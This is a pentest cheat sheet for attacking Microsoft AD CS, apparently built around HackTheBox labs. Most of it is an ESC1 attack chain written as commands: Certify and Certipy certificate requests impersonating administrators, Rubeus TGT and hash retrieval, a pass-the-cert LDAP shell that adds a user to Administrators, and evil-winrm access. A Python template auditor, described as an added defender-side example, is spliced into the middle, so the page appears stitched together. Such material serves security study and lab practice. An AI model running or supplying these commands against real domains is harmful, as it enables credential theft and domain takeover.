AD CS is Microsoft’s PKI implementation that provides everything from encrypting file systems, to digital signatures, to user authentication (a large focus of our research), and more.
There are several different attack vectors, grouped as follows:
- Credential theft (dubbed THEFT1 to THEFT5)
- Account persistence (dubbed PERSIST1 to PERSIST3)
- Domain escalation (dubbed ESC1 to ESC8)
  - based on misconfigured certificate templates
  - based on dangerous CA configuration
  - related to access control vulnerabilities
  - based on an NTLM relay vulnerability related to the web endpoints of AD CS
- Domain persistence (dubbed DPERSIST1 to DPERSIST3)
  - by forging certificates with a stolen CA certificate
  - by trusting rogue CA certificates
  - by maliciously creating vulnerable access controls
Initial Recon
# From UNIX-like systems (Samba's net tool): list the members of the "Cert Publishers" group
Kali> net rpc group members "Cert Publishers" -U "DOMAIN"/"User"%"Password" -S "DomainController"
# From Windows systems:
CMD> net group "Cert Publishers" /domain
Vulnerability Check
# Windows
# https://github.com/r3motecontrol/Ghostpack-CompiledBinaries
CMD> Certify.exe cas
CMD> Certify.exe find /vulnerable
# Linux
# https://github.com/ly4k/Certipy
Kali> certipy find -u 'user@domain.local' -p 'password' -dc-ip 'DC_IP' -vulnerable -stdout
Kali> certipy find -u Ryan.Cooper -p NuclearMosquito3 -target sequel.htb -text -stdout -vulnerable
Kali> certipy find -u 'user@domain.local' -p 'password' -dc-ip 'DC_IP' -old-bloodhound
# Certipy also supports BloodHound. With the -old-bloodhound option, the data is exported for the original version of BloodHound. With the -bloodhound option, the data is exported for the modified version of BloodHound forked by Certipy's author (the default output when no flag is set).
Certificate templates
Template allows SAN (ESC1)
When a certificate template allows the enrollee to specify a subjectAltName (SAN), it is possible to request a certificate for another user. This can be used for privilege escalation if the template's EKU includes Client Authentication or Any Purpose.
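As an added, defender-side example (not code from the original page, Certify or Certipy), the following Python evaluates a template's AD attributes against the ESC1 preconditions just described, and goes slightly beyond the text by also checking manager approval, authorized signatures and enrollment rights the way the tools above do. The attribute names and flag bits are the real AD schema values; the `enroll_rights` list of principal names is an assumed simplification of the template ACL, and the sample templates are constructed.

```python
# Bit in msPKI-Certificate-Name-Flag letting the enrollee supply the subject and SAN.
CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT = 0x00000001
# Bit in msPKI-Enrollment-Flag that holds every request for CA manager approval.
CT_FLAG_PEND_ALL_REQUESTS = 0x00000002
# EKU OIDs that make the issued certificate usable for domain authentication.
AUTH_EKUS = {
    "1.3.6.1.5.5.7.3.2",       # Client Authentication
    "1.3.6.1.4.1.311.20.2.2",  # Smart Card Logon
    "1.3.6.1.5.2.3.4",         # PKINIT Client Authentication
    "2.5.29.37.0",             # Any Purpose
}
# Principals whose enrollment right exposes the template to every domain user. Assumption:
# the ACL is pre-resolved into principal names ("enroll_rights"), not raw nTSecurityDescriptor ACEs.
LOW_PRIV_PRINCIPALS = {"Domain Users", "Authenticated Users", "Domain Computers", "Everyone"}

def esc1_checks(template):
    """Evaluate each ESC1 precondition for one template; ESC1 requires all of them."""
    ekus = template.get("pKIExtendedKeyUsage", [])
    return {
        "enrollee_supplies_subject": bool(
            template.get("msPKI-Certificate-Name-Flag", 0) & CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT),
        # An empty EKU list places no restriction, so it counts as authentication-capable.
        "auth_eku": not ekus or any(oid in AUTH_EKUS for oid in ekus),
        "no_manager_approval": not (
            template.get("msPKI-Enrollment-Flag", 0) & CT_FLAG_PEND_ALL_REQUESTS),
        "no_authorized_signatures": template.get("msPKI-RA-Signature", 0) == 0,
        "low_priv_can_enroll": bool(LOW_PRIV_PRINCIPALS & set(template.get("enroll_rights", []))),
    }

def is_esc1(template):
    """True only when every ESC1 precondition holds."""
    return all(esc1_checks(template).values())

def audit(templates):
    """Return the sorted names of templates that meet every ESC1 precondition."""
    return sorted(name for name, tmpl in templates.items() if is_esc1(tmpl))

# Constructed samples: the first mirrors the misconfiguration described above; the
# second is the same template with the SAN flag cleared, which removes the ESC1 path.
SAMPLE_TEMPLATES = {
    "UserAuthentication": {
        "msPKI-Certificate-Name-Flag": 0x1, "msPKI-Enrollment-Flag": 0x0, "msPKI-RA-Signature": 0,
        "pKIExtendedKeyUsage": ["1.3.6.1.5.5.7.3.2"], "enroll_rights": ["Domain Users"]},
    "UserAuthenticationFixed": {
        "msPKI-Certificate-Name-Flag": 0x0, "msPKI-Enrollment-Flag": 0x0, "msPKI-RA-Signature": 0,
        "pKIExtendedKeyUsage": ["1.3.6.1.5.5.7.3.2"], "enroll_rights": ["Domain Users"]},
}
if __name__ == "__main__":
    print("ESC1 templates:", audit(SAMPLE_TEMPLATES))  # ESC1 templates: ['UserAuthentication']
```

Clearing the ENROLLEE_SUPPLIES_SUBJECT bit, requiring manager approval, or removing the authentication EKUs each breaks the chain, which is why the check reports every precondition separately.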
Windows
# Find vulnerable/abusable certificate templates using the default low-privileged groups
CMD> Certify.exe find /vulnerable
# Find vulnerable/abusable certificate templates using all groups the current user context is a part of:
CMD> Certify.exe find /vulnerable /currentuser
# Once a vulnerable template is found, request a certificate with another high-privileged user set as the SAN (subjectAltName).
CMD> Certify.exe request /ca:'domain\ca' /template:"Vulnerable template" /altname:"admin"
# Save the base64 certificate output by the command above as cert.pem, then convert it to PFX format.
Kali> openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx
# Obtain the TGT. You can convert it to ccache format to use it in Linux later.
CMD> .\Rubeus.exe asktgt /user:Administrator /certificate:cert.pfx /ptt
# Retrieve credentials. You can then conduct a normal pass-the-hash attack.
CMD> .\Rubeus.exe asktgt /user:Administrator /certificate:cert.pfx /getcredentials
See the Pass the Ticket section to convert the ticket to Linux format.
Linux
# To specify a user account in the SAN
Kali> certipy req -u "$USER@$DOMAIN" -p "$PASSWORD" -dc-ip "$DC_IP" -target "$ADCS_HOST" -ca 'ca_name' -template 'vulnerable template' -upn 'domain admin'
Kali> certipy req -u Ryan.Cooper -p NuclearMosquito3 -target sequel.htb -upn Administrator@sequel.htb -ca sequel-DC-CA -template UserAuthentication
# To specify a computer account in the SAN
Kali> certipy req -u "$USER@$DOMAIN" -p "$PASSWORD" -dc-ip "$DC_IP" -target "$ADCS_HOST" -ca 'ca_name' -template 'vulnerable template' -dns 'dc.domain.local'
# Obtain the TGT
Kali> certipy auth -pfx administrator.pfx
# After this, you can export it to the KRB5CCNAME variable and run any commands you want with the new TGT's privileges, such as secretsdump, psexec, etc.
# Obtain the credentials
Kali> certipy auth -pfx <newcert>.pfx
# Typically, you get an NTLM hash.
# Pass the cert
# 1) Extract the public key certificate and the private key
Kali> certipy cert -pfx <newcert>.pfx -nokey -out user.crt
Kali> certipy cert -pfx <newcert>.pfx -nocert -out user.key
# 2) Create an LDAP shell session with the cert and key
Kali> python3 passthecert.py -action ldap-shell -crt user.crt -key user.key -domain htb.corp -dc-ip 10.129.237.92
# 3) Add a new user to Administrators
LDAP_SHELL> add_user_to_group svc_ldap Administrators
# Access the target with the new user and credential
Kali> evil-winrm -i 10.129.237.92 -u 'svc_ldap@htb.corp' -p 'lDaP_1n_th3_cle4r!'
To fix the clock skew issue
# Synchronize time with the DC in case you hit a Kerberos clock skew error.
Kali> sudo ntpdate <DC FQDN>
Kali> sudo ntpdate dc01.sequel.htb